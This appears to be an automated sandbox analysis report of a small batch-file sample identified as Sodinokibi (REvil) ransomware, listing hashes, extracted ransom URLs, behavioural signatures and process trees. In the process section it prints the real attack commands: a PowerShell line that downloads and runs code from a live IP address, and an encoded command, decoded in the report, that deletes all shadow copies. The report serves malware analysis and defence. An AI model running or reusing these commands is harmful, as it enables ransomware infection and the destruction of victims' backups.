Analysis
  max time kernel:  140s
  max time network: 35s
  platform:         windows7_x64
  resource:         win7v200430
  submitted:        21-05-2020 14:10
Static task: static1

Behavioral task: behavioral1
  Sample:   29ec9038cabce56dc3ae0d2ee20d9ed1.bat
  Resource: win7v200430

Behavioral task: behavioral2
  Sample:   29ec9038cabce56dc3ae0d2ee20d9ed1.bat
  Resource: win10v200430
General
  Target: 29ec9038cabce56dc3ae0d2ee20d9ed1.bat
  Size:   218B
  MD5:    b85f82f85e6208e52b6c015cd92e274d
  SHA1:   367648ab3b293615c8b98a358c8b0cf5cf69950a
  SHA256: 6d611f64b2ac03203102331de336feb8d67ea6e9f258e1b245614e239dd1df80
  SHA512: 15ee6c6c54e1ccaaf594adc6cf271634684669c55dfe1a853429f374fe2eb53b92642c373a0836b3e55f98c2b7bc874b0ad5cf650a593811173ae7bd2a567e12
Malware Config
  Extracted from: http://185.103.242.78/pastes/29ec9038cabce56dc3ae0d2ee20d9ed1
  Extracted from: C:\i449h0d19-readme.txt
    sodinokibi
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB
    http://decryptor.cc/B5220888DF7426CB
Signatures

  Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
    Processes:
      pid   process
      868   powershell.exe
  Suspicious use of WriteProcessMemory (5 IoCs)
    Processes:
      description                       pid    process          target process
      PID 1520 wrote to memory of 868   1520   cmd.exe          powershell.exe
      PID 868 wrote to memory of 1804   868    powershell.exe   powershell.exe
      PID 868 wrote to memory of 1804   868    powershell.exe   powershell.exe
      PID 868 wrote to memory of 1804   868    powershell.exe   powershell.exe
      PID 868 wrote to memory of 1804   868    powershell.exe   powershell.exe
  Blacklisted process makes network request (1 IoC)
    Processes:
      flow   pid   process
      1      868   powershell.exe
  Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
    Processes:
      description       ioc                                                                                                                                                   process
      Set value (str)   \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a0i0y6v3n4.bmp"   powershell.exe
  Enumerates connected drives (3 TTPs)
  Drops file in Program Files directory (26 IoCs)
    Processes:
      description                    ioc                                                                                        process
      File created                   \??\c:\program files (x86)\i449h0d19-readme.txt                                            powershell.exe
      File opened for modification   \??\c:\program files\ClearUnlock.snd                                                       powershell.exe
      File opened for modification   \??\c:\program files\ConvertFromCompare.aiff                                               powershell.exe
      File created                   \??\c:\program files\microsoft sql server compact edition\i449h0d19-readme.txt             powershell.exe
      File opened for modification   \??\c:\program files\RenameSplit.gif                                                       powershell.exe
      File opened for modification   \??\c:\program files\SkipExpand.ttc                                                        powershell.exe
      File opened for modification   \??\c:\program files\WatchLimit.jpeg                                                       powershell.exe
      File created                   \??\c:\program files\i449h0d19-readme.txt                                                  powershell.exe
      File opened for modification   \??\c:\program files\CloseCompare.001                                                      powershell.exe
      File opened for modification   \??\c:\program files\DenyAssert.3gp2                                                       powershell.exe
      File opened for modification   \??\c:\program files\InitializeSubmit.vstm                                                 powershell.exe
      File opened for modification   \??\c:\program files\RedoRestart.asf                                                       powershell.exe
      File opened for modification   \??\c:\program files\RegisterGet.mp4                                                       powershell.exe
      File opened for modification   \??\c:\program files\WatchSync.vb                                                          powershell.exe
      File opened for modification   \??\c:\program files\CheckpointNew.pcx                                                     powershell.exe
      File opened for modification   \??\c:\program files\DebugConnect.shtml                                                    powershell.exe
      File opened for modification   \??\c:\program files\MergePop.gif                                                          powershell.exe
      File opened for modification   \??\c:\program files\MountCopy.docx                                                        powershell.exe
      File opened for modification   \??\c:\program files\ProtectRevoke.xla                                                     powershell.exe
      File opened for modification   \??\c:\program files\PushPop.MTS                                                           powershell.exe
      File opened for modification   \??\c:\program files\SyncExit.TS                                                           powershell.exe
      File created                   \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\i449h0d19-readme.txt powershell.exe
      File opened for modification   \??\c:\program files\NewMount.3gpp                                                         powershell.exe
      File opened for modification   \??\c:\program files\UnblockExpand.dot                                                     powershell.exe
      File opened for modification   \??\c:\program files\UseWait.mpeg                                                          powershell.exe
      File created                   \??\c:\program files\microsoft sql server compact edition\v3.5\i449h0d19-readme.txt        powershell.exe
  Suspicious use of AdjustPrivilegeToken (7 IoCs)
    Processes:
      description                       pid    process
      Token: SeDebugPrivilege           868    powershell.exe
      Token: SeDebugPrivilege           868    powershell.exe
      Token: SeDebugPrivilege           1804   powershell.exe
      Token: SeBackupPrivilege          464    vssvc.exe
      Token: SeRestorePrivilege         464    vssvc.exe
      Token: SeAuditPrivilege           464    vssvc.exe
      Token: SeTakeOwnershipPrivilege   868    powershell.exe
  Suspicious behavior: EnumeratesProcesses (77 IoCs)
    Processes (distinct pid/process pairs across the 77 hits):
      pid    process
      868    powershell.exe
      1804   powershell.exe
  Sodin, Sodinokibi, REvil
    Ransomware with advanced anti-analysis and privilege escalation functionality.
  Modifies service (2 TTPs, 4 IoCs)
    Processes:
      description   ioc                                                                                         process
      Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                    vssvc.exe
      Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                  vssvc.exe
      Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                         vssvc.exe
      Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer    vssvc.exe
Processes

  C:\Windows\system32\cmd.exe (PID 1520, tree depth 1)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\29ec9038cabce56dc3ae0d2ee20d9ed1.bat"
    Signatures:
      - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 868, tree depth 2)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/29ec9038cabce56dc3ae0d2ee20d9ed1');Invoke-PYPLANTTDQA;Start-Sleep -s 10000"
      Signatures:
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious use of WriteProcessMemory
        - Blacklisted process makes network request
        - Sets desktop wallpaper using registry
        - Drops file in Program Files directory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1804, tree depth 3)
        Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which is the shadow-copy deletion that explains the vssvc.exe activity below)
        Signatures:
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious behavior: EnumeratesProcesses

  C:\Windows\system32\vssvc.exe (PID 464, tree depth 1)
    Command line: C:\Windows\system32\vssvc.exe
    Signatures:
      - Suspicious use of AdjustPrivilegeToken
      - Modifies service